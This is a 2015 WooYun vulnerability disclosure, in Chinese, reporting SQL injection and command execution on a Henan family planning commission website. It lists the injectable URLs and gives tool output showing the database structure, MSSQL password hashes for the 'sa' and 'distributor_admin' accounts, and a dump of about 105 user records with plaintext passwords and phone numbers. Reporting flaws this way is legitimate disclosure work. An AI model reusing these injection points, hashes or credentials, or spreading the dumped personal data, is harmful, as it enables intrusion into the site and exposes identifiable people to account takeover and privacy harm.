河南省某人口和计划生育委员会主站SQL漏洞并可命令执行（大量用户信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137146

漏洞标题：河南省某人口和计划生育委员会主站SQL漏洞并可命令执行（大量用户信息）

漏洞作者：泪雨无魂

提交时间：2015-08-28 17:51

修复时间：2015-10-12 16:06

公开时间：2015-10-12 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：14

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-28：细节已通知厂商并且等待厂商处理中
2015-08-28：厂商已经确认，细节仅向厂商公开
2015-09-07：细节向核心白帽子及相关领域专家公开
2015-09-17：细节向普通白帽子公开
2015-09-27：细节向实习白帽子公开
2015-10-12：细节向公众公开

简要描述：

河南省某人口和计划生育委员会主站SQL漏洞，SA权限已经拿下服务器。。。

详细说明：

注入点：
http://www.xxsjsw.gov.cn/HNWeb/conference/09zrpxbmore.aspx?category=202 存在sql注入漏洞
http://www.xxsjsw.gov.cn/hnweb/conference/08dsdhhymore.aspx?category=156 存在sql注入漏洞

web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [11]:
[*] bakdata
[*] distribution
[*] hnjsw35
[*] hnweb
[*] hx
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
current user:    'sa'
current database:    'hnweb'
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] distributor_admin [1]:
    password hash: 0x0100c4c24a7eadebc6b9ee976addd87d69c36b76fcb988979a4f
        header: 0x0100
        salt: c4c24a7e
        mixedcase: adebc6b9ee976addd87d69c36b76fcb988979a4f
[*] sa [1]:
    password hash: 0x01004086ceb6f08d98cbf8632ecff057d2e42f2abc90441ed5c4
        header: 0x0100
        salt: 4086ceb6
        mixedcase: f08d98cbf8632ecff057d2e42f2abc90441ed5c4   
Database: hnweb
[28 tables]
+--------------+
| Code         |
| D99_CMD      |
| D99_REG      |
| D99_Tmp      |
| HNClass      |
| HNFileName   |
| HNNews       |
| HNUsers      |
| HNVideo      |
| HnReplyXf    |
| HnUserXf     |
| HnXingFang   |
| RTLCode      |
| RTLReport    |
| RTLUserLogin |
| __orm__      |
| comd_list    |
| comment      |
| counts       |
| dtproperties |
| guestbook    |
| ldemail      |
| t_jiaozhu    |
| vote         |
| webset       |
| xiaolu       |
| xxzxvote     |
| zixun        |
+--------------+
Database: hnweb
Table: HNUsers
[11 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| Authority   | varchar  |
| BM          | nvarchar |
| Email       | varchar  |
| RealName    | varchar  |
| RegeditTime | datetime |
| Status      | char     |
| Telephone   | varchar  |
| UnitName    | varchar  |
| UserID      | int      |
| UserName    | varchar  |
| UserPsw     | varchar  |
+-------------+----------+
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005
Database: hnweb
Table: HNUsers
[105 entries]
+------------------+----------------+-----------------+--------------------------+
| UserName         | UserPsw        | Telephone       | Email                    |
+------------------+----------------+-----------------+--------------------------+
| 1                | 2              | 1               | 1                        |
| xxzxzln          | yhw361385      | 65707813        | [email protected]       |
| <blank>          | <blank>        | <blank>         | 314844289?COM            |
| xpxbcz           | 1234567        | 03966222228     | [email protected]         |
| 黑色幽灵             | 666888         | 0396-6222706    | [email protected]         |
| 燃烧的雪             | 6829229        | 0379---66822428 | [email protected]     |
| asdad            | 1              | 43543           | [email protected]             |
| ayivy            | 2565833        | ayivy           | [email protected]            |
| cheng            | 1120           | 8680334         | [email protected]      |
| 清心醉月             | 20050604       | 68825776        | [email protected]      |
| bamboo1972       | 121315         | 0379-67913675   | [email protected]       |
| xajsw            | 125689         | 037967285612    | [email protected]       |
| dhjdjsb          | dhjdjsb        | 3581148-8013    | [email protected]         |
| guoderen         | 631106         | 65983613        | [email protected]      |
| 秋雨               | 875692         | 0378-4993901    | [email protected]      |
| 渑池县英豪镇           | 411221         | 0398-4730305    | [email protected]         |
| 崔平               | 19650103       | 3131910         | [email protected]        |
| 草民               | 321321         | 65561997        | [email protected]        |
| cxg_009          | 123456         | 03746165516     | [email protected]          |
| dfjsw            | 2872456        | 2872456         | [email protected]         |
| 平凡的人             | 198102         | 2546566         | [email protected]           |
| dxyjlf           | jlf123         | 3790809         | [email protected]          |
| dzjsw            | deltree        | 0377-66063773   | [email protected]            |
| 雨晴               | <blank>        | 无               | [email protected]         |
| 丁光辉              | 123456789      | 13343889991     | [email protected]            |
| <blank>          | <blank>        | <blank>         | gaojiashe?com.tom        |
| <blank>          | <blank>        | <blank>         | gaojiashen?tom.com       |
| 411025000000     | 111            | 3582513         | [email protected]         |
| 月光下的迪斯科          | 007606         | 0398-4700719    | [email protected]      |
| gxqjsw           | 2663073        | 2663073         | [email protected]           |
| 4936932          | 000            | 13721432158     | [email protected]      |
| mtytjk           | 82228608222860 | 8222860         | [email protected]       |
| zhang123         | 198612         | 4700997         | [email protected]         |
| <blank>          | <blank>        | <blank>         | HJJSWTJK?163.COM         |
| 林子               | 780503         | 0372-2995029    | [email protected]         |
| 跳跳虎              | 007007         | *******         | [email protected]          |
| hnscjsw          | 750110001      | 0396-6962803    | [email protected]       |
| xyxjsw           | 6113019        | 03706113019     | [email protected]          |
| ayxjsx           | 741218         | 0372－5257522    | [email protected]     |
| hjt1978          | houjuntao      | 03756887002     | [email protected]    |
| jacky            | 6621353000     | 0376-6608903    | [email protected]       |
| lyzjb            | 800818         | 13507658848     | [email protected]   |
| 佳四               | 1978119        | 5505126         | [email protected]           |
| bigfisher2005    | 663526341      | 63526341        | [email protected]       |
| ngqjsw           | lin4xiao3xu4   | 0378-3386879    | [email protected]            |
| 海阔天空             | 3507674455     | 13507674455     | [email protected]      |
| lcxjsw           | 633633         | 0379---66822428 | [email protected]         |
| 如梦人生             | 760110         | 1234569         | [email protected]         |
| 漯河               | 411100         | 3131823         | [email protected]            |
| liuxuejun        | 68868399       | 13007536338     | [email protected]        |
| 消逝的王者            | 13569372508    | 13125562389     | [email protected]   |
| ltqjsw           | ltqjsw         | 03782883583     | [email protected]           |
| yuwei0715        | 2890713        | 0398-2187617    | [email protected]   |
| lysjswfgk        | 3330455        | 0379－63330455   | [email protected]           |
| 123              | 123456         | 6812345         | [email protected]            |
| 王虹               | 810517         | 13603431810     | [email protected]       |
| lzsjsw           | 312918         | 03726899759     | [email protected]         |
| 梦歌               | woshinw        | 13838566690     | [email protected]      |
| nhgct            | 7711987        | 03727711987     | [email protected]           |
| 计生工作             | 19730408       | 3135850         | [email protected]      |
| pyjsw            | pyjsw          | 122345          | [email protected]            |
| ljs82092         | 13839282092    | 13839282092     | [email protected]        |
| qiliang          | 19850514       | 13721891558     | [email protected]   |
| qxlyh            | qxlyhdb        | 0378-8991697    | [email protected]            |
| qz882            | quitquestions  | 3700209         | [email protected]          |
| rain_favorite    | xiyuheng       | 13569514093     | [email protected]   |
| hnlzlzs          | 6043358        | 6043358         | [email protected]            |
| rysdz            | 68120006       | 68120006        | [email protected]            |
| lyl              | 751013         | 0391-35666659   | s3892121                 |
| zxd              | 751013         | 0391-3566659    | [email protected]         |
| s3892121         | 3566659        | 0391-3566659    | [email protected]        |
| smallfan         | 000000         | 1               | [email protected]         |
| spjswzch         | jswzch33       | 0396-4952957    | [email protected]        |
| SPJSW            | spjsw          | 0396-4952957    | [email protected]        |
| 万剑尊者             | 123qaz456      | 0394-5222879    | [email protected]        |
| sunwei26         | sunwei         | 03913215803     | [email protected]        |
| t996             | 13837859946    | 13837841529     | [email protected]             |
| 106556668        | 376955223      | 3232725         | [email protected]              |
| 信息               | 2826134        | 0373-2826134    | [email protected]           |
| whtjs701027      | 999999         | 0373-4480860    | [email protected]      |
| 白楼乡计生办           | 2761017        | 2761017         | [email protected]      |
| PYXJSB           | 965101         | 62437028        | [email protected] |
| 6183218          | 6183218        | 6183218         | [email protected]             |
| wtu              | 413374         | 13818177971     | [email protected]  |
| wzs              | 2666527        | 666666          | [email protected]         |
| WZX              | 123456789      | 65707813        | [email protected]   |
| xcjsw            | xcjsw          | xcjsw           | [email protected]           |
| xiangchengrenkou | xiangcheng     | ０３９４４２９６３９１     | [email protected] |
| asdxcv           | asdxcv         | 037162568022    | [email protected]       |
| xyjswcai         | caiqing        | 03766610196     | [email protected]         |
| yangzl           | 19660821       | 0391-5612710    | [email protected]       |
| yanziqyh         | 6722978        | 13193939996     | [email protected]        |
| 瑶                | 40488          | 135********     | [email protected]         |
| 笑笑               | 7801           | 0395－2199671    | [email protected]          |
| xcwxc            | sangao03       | 13033934027     | [email protected]      |
| 延津张扬             | 7726109        | 03737695468     | [email protected]       |
| yljsw            | 781016         | 7160799         | [email protected]           |
| yszhaoln         | 665875         | 037967738201    | [email protected]    |
| yyj212313        | 198006         | 0391-3569350    | [email protected]        |
| zcwxzb           | 123456         | 0379--66822428  | [email protected]           |
| nec              | 760509         | 0379---66822428 | [email protected]           |
| zhqjsw           | 111111         | 4942705         | [email protected]           |
| zhengyang        | 123456         | 0396-8910687    | [email protected]     |
| qlyjsb           | 13383858511    | ６８７８６０２２        | [email protected]     |
| 王冠               | 8899           | 03937927003     | 古城乡                      |
+------------------+----------------+-----------------+--------------------------+